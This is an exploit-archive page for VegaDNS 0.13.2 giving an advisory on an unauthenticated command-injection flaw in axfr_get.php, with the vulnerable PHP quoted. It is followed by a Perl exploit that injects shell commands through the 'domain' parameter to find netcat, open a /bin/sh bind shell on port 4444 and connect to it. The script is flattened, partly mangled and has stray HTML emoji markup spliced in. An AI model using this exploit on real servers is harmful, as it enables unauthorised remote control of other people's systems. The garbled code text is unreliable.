VegaDNS 0.13.2 - Remote Command Injection

2016.09.21
Credit: Wireghoul
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl To all the people with mad skills who share their knowledge: TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO, mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan, lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil, laughing_mantis, g0tm1k, nmrc, and many many more.... };$a=qq^ VegaDNS is a tinydns administration tool written in PHP to allow easy administration of DNS records through a web browser. -- http://www.vegadns.org The file axfr_get.php allows unauthenticated access and fails to correctly apply input escaping to all variables that is based on user input. This allows an attacker to inject shell syntax constructs to take control of the command execution. The following code from axfr_get.php shows how the variable $file becomes tainted trough the $domain variable which is tainted from direct user input. The application tries to prevent this by escaping the $domain and $hostname variables, but fails to escape the $file variable. ---------------------------cut--------------------------- * NOTE: * This functionality ONLY exists outside of the main application * because tcplient kept dying fatally due to file descriptor 7 * being unavailable, which only occurs AFTER session_start() is * called. * */ require_once 'src/config.php'; // CHECKS // Make sure the hostname was given if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") { echo "ERROR: no hostname given\n"; exit; } // Make sure that some domains were given if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") { echo "ERROR: no domain was supplied\n"; exit; } $domain = $_REQUEST['domain']; $hostname = $_REQUEST['hostname']; $rand = rand(); $file = "/tmp/$domain.$rand"; $command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1"; exec($command, $out); ---------------------------end--------------------------- ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ^; print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by @Wireghoul\n"; print " "."=" x 50 ."[justanotherhacker.com]==\n"; &usage if ($ARGV[0] !~ m!.+://([^/:]+)!); $h=$1; print " . . . Locating netcat\n"; $cmd='which+nc'; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -s -k '$t'`; if ($z !~ m{/nc}) { print " ! ! ! netcat not found! Manual exploitation required:\n"; print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n"; exit 1; } print " . . . netcat found: $z\n"; print " . . . Performing IZUNA DROP!\n"; # ← · ↑ · → · ↓ · <img src="https://s.w.org/images/core/emoji/2/svg/2196.svg" alt="↖" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2197.svg" alt="↗" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2198.svg" alt="↘" class="emoji" draggable="false"> · <img src="https://s.w.org/images/core/emoji/2/svg/2199.svg" alt="↙" class="emoji" draggable="false"> print " ↓ ↓ ↑ *k* → → *p*\n"; $cmd="$z+-e+/bin/sh+-lp+4444"; $t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev"; $z=`curl -m 3 -s -k '$t &'`; print $vg."\n"; print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n"; system("nc -v $h 4444"); sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top